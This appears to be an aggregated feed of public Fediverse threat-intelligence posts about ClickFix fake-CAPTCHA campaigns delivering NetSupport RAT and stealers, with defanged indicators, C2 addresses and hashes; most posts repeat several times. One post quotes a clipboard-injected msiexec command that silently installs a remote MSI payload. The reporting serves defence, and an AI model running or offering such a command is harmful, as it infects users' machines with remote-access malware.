#netsupportrat — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #netsupportrat, aggregated by home.social.
-
ClickFix Removes Your Background but Leaves the Malware
BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.
Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault
-
ClickFix Removes Your Background but Leaves the Malware
BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.
Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault
-
ClickFix Removes Your Background but Leaves the Malware
BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.
Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault
-
ClickFix Removes Your Background but Leaves the Malware
BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.
Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault
-
ClickFix Removes Your Background but Leaves the Malware
BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to verify they are human, copying malicious commands to their clipboard that invoke finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions through DPAPI decryption and Restart Manager APIs. The campaign leverages BYOI tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, causing silent failures.
Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault
-
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://isc.sans.edu/diary/32826
-
2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.
Details at www.malware-traffic-analysis.net/2025/12/29/index.html
Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.
The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.
-
2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.
Details at www.malware-traffic-analysis.net/2025/12/29/index.html
Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.
The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.
-
2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.
Details at www.malware-traffic-analysis.net/2025/12/29/index.html
Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.
The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.
-
New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.
Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/
-
New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.
Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/
-
New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.
Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/
-
New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.
Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/
-
New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.
Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/
-
Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.
The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.
Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.Thoughts on this growing reliance on execution through supposedly “trusted” system tools?
💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch
-
Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.
The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.
Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.Thoughts on this growing reliance on execution through supposedly “trusted” system tools?
💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch
-
Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.
The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.
Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.Thoughts on this growing reliance on execution through supposedly “trusted” system tools?
💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474
-
Neue EVALUSION‑ClickFix‑Kampagne:
Amatera‑Stealer und NetSupport‑RAT werden verbreitetCyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.
Mehr: https://maniabel.work/archiv/265
#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS
-
EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT
#AmateraStealer #NetSupportRAT
https://www.esentire.com/blog/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat -
SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474 -
SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474 -
SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474 -
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
-
2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)
Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.
Other sites have injected script that redirects to the URL for the fake CAPTCHA page.
Direct example (compromised site --> script for CAPTCHA page):
- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.jsRecirect example (compromised site --> Redirect URL --> script for CAPTCHA page):
- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.jsEither way, you get the same CAPTCHA page.
IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt
cc: @monitorsg
-
2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)
Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.
Other sites have injected script that redirects to the URL for the fake CAPTCHA page.
Direct example (compromised site --> script for CAPTCHA page):
- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.jsRecirect example (compromised site --> Redirect URL --> script for CAPTCHA page):
- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.jsEither way, you get the same CAPTCHA page.
IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt
cc: @monitorsg
-
2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)
Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.
Other sites have injected script that redirects to the URL for the fake CAPTCHA page.
Direct example (compromised site --> script for CAPTCHA page):
- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.jsRecirect example (compromised site --> Redirect URL --> script for CAPTCHA page):
- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.jsEither way, you get the same CAPTCHA page.
IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt
cc: @monitorsg
-
2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.
Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html
-
2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.
Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html
-
2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.
Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html
-
2025-07-15 (Tuesday): Tracking #SmartApeSG
The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site (same as yesterday):
- medthermography[.]com
URLs for ClickFix style fake verification page:
- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9Running the script for NetSupport RAT:
- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773#NetSupport RAT server (same as yesterday):
- 185.163.45[.]87:443
-
2025-07-15 (Tuesday): Tracking #SmartApeSG
The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site (same as yesterday):
- medthermography[.]com
URLs for ClickFix style fake verification page:
- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9Running the script for NetSupport RAT:
- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773#NetSupport RAT server (same as yesterday):
- 185.163.45[.]87:443
-
2025-07-15 (Tuesday): Tracking #SmartApeSG
The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site (same as yesterday):
- medthermography[.]com
URLs for ClickFix style fake verification page:
- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9Running the script for NetSupport RAT:
- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773#NetSupport RAT server (same as yesterday):
- 185.163.45[.]87:443
-
2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site:
- medthermography[.]com
URLs for ClickFix style fake verification page:
- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971Running the script for NetSupport RAT:
- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526#NetSupport RAT server:
- 185.163.45[.]87:443
-
2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site:
- medthermography[.]com
URLs for ClickFix style fake verification page:
- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971Running the script for NetSupport RAT:
- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526#NetSupport RAT server:
- 185.163.45[.]87:443
-
2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.
Compromised site:
- medthermography[.]com
URLs for ClickFix style fake verification page:
- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971Running the script for NetSupport RAT:
- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526#NetSupport RAT server:
- 185.163.45[.]87:443
-
Example 1: #RunFix
As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT
-
Example 1: #RunFix
As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT
-
Example 1: #RunFix
As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT
-
2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT
URL sequence leading to ClickFix:
- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfaURL sequence after running ClickFix script:
- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928SHA256 hash for smks.zip archive containing NetSupport RAT package:
3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5
NetSupportRAT C2: 185.163.45[.]30:443
cc: @monitorsg
-
2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT
URL sequence leading to ClickFix:
- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfaURL sequence after running ClickFix script:
- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928SHA256 hash for smks.zip archive containing NetSupport RAT package:
3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5
NetSupportRAT C2: 185.163.45[.]30:443
cc: @monitorsg
-
2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT
URL sequence leading to ClickFix:
- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfaURL sequence after running ClickFix script:
- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928SHA256 hash for smks.zip archive containing NetSupport RAT package:
3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5
NetSupportRAT C2: 185.163.45[.]30:443
cc: @monitorsg